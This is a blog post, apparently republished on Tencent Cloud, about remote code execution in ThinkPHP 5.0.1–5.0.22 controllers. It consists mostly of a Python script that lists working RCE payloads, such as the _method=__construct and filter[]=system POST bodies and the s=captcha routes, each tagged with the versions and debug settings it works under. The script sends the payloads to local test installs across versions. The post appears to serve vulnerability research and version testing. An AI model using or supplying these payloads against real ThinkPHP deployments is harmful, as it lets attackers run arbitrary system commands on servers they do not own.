thinkphp(一) : 5.0.1~22控制器RCE

h0cksr

发布于 2023-05-17 09:17:22

1900

发布于 2023-05-17 09:17:22

RCE版本范围 : 5.0.1~22

import requests,time
args=""
data={}
# debug=false时无RCE,debug=true时5.0.21~22
# data={"_method":"__construct","filter":"system","server[REQUEST_METHOD]":"whoami"}

#debug=false时5.0.1~12，debug=true时5.0.1~20
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.19，debug=true时5.0.2~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=get&get[]=whoami"

#debug=false时无RCE，debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami"

# debug=false时5.0.19，debug=true时5.0.22~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&get[]=whoami"

#debug=false时5.0.1~12，debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12，debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12，debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时5.0.1~12，debug=true时5.0.1~22
# args="?s=index/index"
# data="_method=__construct&method=GET&filter[]=system&get[]=whoami"

#debug=false时5.0.8~12，debug=true时5.0.8~20
# args="?s=index/index"
# data="c=system&f=whoami&_method=filter"

#debug=false时5.0.1~12，debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12，debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时无RCE，debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=whoami"

url="http://127.0.0.1/tp/tp{version}/public/index.php"
judeju_str="laptop-da05slh8\\26406"

success=[]
def get_data(post_data):
    arr=str(post_data).split("&")
    end={}
    print(arr)
    for i in arr:
        t=i.split("=")
        end[t[0]]=t[1]
    return end

def change_debug(file_anme,data):
    f=open(file_anme,"w")
    f.write(data)
    f.close()

def once():
    for i in range(25):
        _args = args
        _url = url.format(version="5.0." + str(i)) + args
        print(i)
        if (data != {}):
            text = requests.post(_url,data).text
        else:
            text = r=requests.get(_url).text
        if (judeju_str in text):
            print("success!!!")
            success.append("5.0."+str(i))
            # time.sleep(1)

if(type(data)!=type({})):
    data=get_data(data)
for debug in ["false","true"]:
    success.append("debug="+debug+"时,成功RCE的有:")
    print("Here is \"app_debug = "+debug+"\"")
    for i in range(25):
        try:
            file_name = "D:\phpstudy\WWW\\tp\\tp5.0.{version}\.env"
            change_debug(file_name.format(version=str(i)), "app_debug = "+debug)
        except:
            pass
    once()
    print(success)
    for j in success:
        print(str(j))
    print()
#没有5.0.17也没有5.0.23

本文参与腾讯云自媒体分享计划，分享自作者个人站点/博客。

原始发表：2021-12-23 ，如有侵权请联系 cloudcommunity@tencent.com 删除

thinkphp